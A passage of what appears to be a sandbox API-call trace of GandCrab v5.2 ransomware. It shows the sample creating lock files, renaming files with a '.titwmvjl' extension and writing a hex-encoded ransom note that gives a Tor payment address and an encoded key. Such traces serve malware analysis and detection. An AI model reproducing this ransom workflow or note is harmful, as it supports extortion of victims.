c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.355] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0073.356] CloseHandle (hObject=0x2bc) returned 1 [0073.357] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.357] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.357] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x29c)) [0073.357] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.357] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.358] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.358] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock") returned 91 [0073.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0073.423] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.423] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 67 [0073.423] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0073.423] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503738 [0073.424] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.424] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.424] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.424] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.424] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.424] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.424] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.424] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock" [0073.424] lstrlenW (lpString=".titwmvjl") returned 9 [0073.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock") returned 91 [0073.424] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.424] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 100 [0073.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a09d2ca4deb61a.lock") returned 91 [0073.424] lstrlenW (lpString=".lock") returned 5 [0073.424] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.425] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.425] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.425] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.425] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.425] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0073.425] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0073.425] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0073.425] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0073.425] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.426] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.426] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.427] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.427] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.427] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.427] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.427] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\TITWMVJL-DECRYPT.txt") returned 91 [0073.427] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0073.461] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x